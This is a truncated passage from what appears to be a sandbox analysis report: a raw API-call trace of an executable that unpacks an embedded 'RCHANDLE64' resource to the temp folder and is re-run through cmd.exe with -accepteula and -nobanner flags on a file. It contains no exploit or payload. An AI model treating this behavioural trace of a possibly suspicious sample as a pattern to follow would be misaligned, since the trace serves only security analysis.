Size=0x62) returned 0x547ec8 [0237.741] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2e) returned 0x547f38 [0237.741] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x48) returned 0x547f70 [0237.741] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2c) returned 0x547fc0 [0237.741] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x28) returned 0x547ff8 [0237.741] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x1a) returned 0x546a70 [0237.741] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4a) returned 0x548028 [0237.741] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x72) returned 0x53f980 [0237.741] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x30) returned 0x548080 [0237.741] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2e) returned 0x5480b8 [0237.741] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x1c) returned 0x546a98 [0237.741] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xd2) returned 0x5480f0 [0237.741] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x7c) returned 0x5481d0 [0237.741] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x36) returned 0x548258 [0237.741] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x3a) returned 0x544e18 [0237.741] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x90) returned 0x548298 [0237.741] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x24) returned 0x548330 [0237.742] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x30) returned 0x548360 [0237.742] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x36) returned 0x548398 [0237.742] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x48) returned 0x5483d8 [0237.742] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x52) returned 0x548428 [0237.742] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x3c) returned 0x544e60 [0237.742] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x18) returned 0x548488 [0237.742] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x82) returned 0x5484a8 [0237.742] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2e) returned 0x548538 [0237.742] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x1e) returned 0x546ac0 [0237.742] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2c) returned 0x548570 [0237.742] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x54) returned 0x5485a8 [0237.742] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x52) returned 0x548608 [0237.742] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2a) returned 0x548668 [0237.742] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x3c) returned 0x544ea8 [0237.742] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x54) returned 0x5486a0 [0237.742] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x24) returned 0x548700 [0237.742] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x30) returned 0x548730 [0237.742] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x8c) returned 0x548768 [0237.742] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x548820 | out: hHeap=0x530000) returned 1 [0237.743] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x800) returned 0x548800 [0237.743] GetLastError () returned 0x0 [0237.743] SetLastError (dwErrCode=0x0) [0237.743] GetLastError () returned 0x0 [0237.743] SetLastError (dwErrCode=0x0) [0237.743] GetLastError () returned 0x0 [0237.743] SetLastError (dwErrCode=0x0) [0237.743] GetACP () returned 0x4e4 [0237.743] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x220) returned 0x549008 [0237.743] GetLastError () returned 0x0 [0237.743] SetLastError (dwErrCode=0x0) [0237.743] IsValidCodePage (CodePage=0x4e4) returned 1 [0237.743] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1 [0237.743] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1 [0237.743] GetLastError () returned 0x0 [0237.743] SetLastError (dwErrCode=0x0) [0237.743] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0237.743] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0237.743] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1 [0237.743] GetLastError () returned 0x0 [0237.743] SetLastError (dwErrCode=0x0) [0237.744] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0237.744] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0237.744] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0237.744] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0237.744] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÅîQ\x14äþ\x18", lpUsedDefaultChar=0x0) returned 256 [0237.744] GetLastError () returned 0x0 [0237.744] SetLastError (dwErrCode=0x0) [0237.744] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0237.744] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0237.744] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0237.744] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0237.744] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÅîQ\x14äþ\x18", lpUsedDefaultChar=0x0) returned 256 [0237.744] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x80) returned 0x549230 [0237.744] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0237.744] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0237.745] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x549230) returned 0x80 [0237.745] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0237.745] GetProcAddress (hModule=0x76d30000, lpProcName="IsWow64Process") returned 0x76d4195e [0237.745] GetCurrentProcess () returned 0xffffffff [0237.745] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18ff34 | out: Wow64Process=0x18ff34) returned 1 [0237.745] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fd28, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0237.745] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x18fb20, nSize=0x104 | out: lpDst="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x25 [0237.745] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0237.745] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0237.745] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0237.745] LockResource (hResData=0x43c648) returned 0x43c648 [0237.745] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x18) returned 0x549700 [0237.746] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x18f95c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.746] GetLastError () returned 0x20 [0237.746] GetLastError () returned 0x20 [0237.746] SetLastError (dwErrCode=0x20) [0237.746] GetLastError () returned 0x20 [0237.746] SetLastError (dwErrCode=0x20) [0237.746] GetLastError () returned 0x20 [0237.746] SetLastError (dwErrCode=0x20) [0237.746] GetLastError () returned 0x20 [0237.746] SetLastError (dwErrCode=0x20) [0237.746] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x1000) returned 0x549720 [0237.747] GetLastError () returned 0x20 [0237.747] SetLastError (dwErrCode=0x20) [0237.747] GetLastError () returned 0x20 [0237.747] SetLastError (dwErrCode=0x20) [0237.747] GetLastError () returned 0x20 [0237.747] SetLastError (dwErrCode=0x20) [0237.747] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18e38c | out: lpMode=0x18e38c) returned 1 [0237.747] WriteFile (in: hFile=0x7, lpBuffer=0x18ea68*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x18e394, lpOverlapped=0x0 | out: lpBuffer=0x18ea68*, lpNumberOfBytesWritten=0x18e394*=0x49, lpOverlapped=0x0) returned 1 [0237.793] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x548800 | out: hHeap=0x530000) returned 1 [0237.793] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18fedc | out: phModule=0x18fedc) returned 0 [0237.794] ExitProcess (uExitCode=0x1) [0237.794] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5470a0 | out: hHeap=0x530000) returned 1 Process: id = "253" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x288a7000" os_pid = "0x264" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "217" os_parent_pid = "0xad4" cmd_line = "C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"Dotted_Line.jtp\" -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 861 os_tid = 0xa44 [0236.857] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1efad4 | out: lpSystemTimeAsFileTime=0x1efad4*(dwLowDateTime=0x4342dea0, dwHighDateTime=0x1d68287)) [0236.857] GetCurrentProcessId () returned 0x264 [0236.857] GetCurrentThreadId () returned 0xa44 [0236.857] GetTickCount () returned 0x116629a [0236.857] QueryPerformanceCounter (in: lpPerformanceCount=0x1efacc | out: lpPerformanceCount=0x1efacc*=35719567697) returned 1 [0236.858] GetModuleHandleA (lpModuleName=0x0) returned 0x49da0000 [0236.858] __set_app_type (_Type=0x1) [0236.859] __p__fmode () returned 0x770331f4 [0236.859] __p__commode () returned 0x770331fc [0236.859] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49dc21a6) returned 0x0 [0236.859] __getmainargs (in: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c, _DoWildCard=0, _StartInfo=0x49dc4140 | out: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c) returned 0 [0236.859] GetCurrentThreadId () returned 0xa44 [0236.859] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa44) returned 0x60 [0236.859] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0236.859] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0236.859] SetThreadUILanguage (LangId=0x0) returned 0x409 [0236.860] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0236.860] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1efa64 | out: phkResult=0x1efa64*=0x0) returned 0x2 [0236.861] VirtualQuery (in: lpAddress=0x1efa9b, lpBuffer=0x1efa34, dwLength=0x1c | out: lpBuffer=0x1efa34*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0236.861] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1efa34, dwLength=0x1c | out: lpBuffer=0x1efa34*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0236.861] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1efa34, dwLength=0x1c | out: lpBuffer=0x1efa34*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0236.861] VirtualQuery (in: lpAddress=0xf3000, lpBuffer=0x1efa34, dwLength=0x1c | out: lpBuffer=0x1efa34*(BaseAddress=0xf3000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0236.861] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1efa34, dwLength=0x1c | out: lpBuffer=0x1efa34*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, 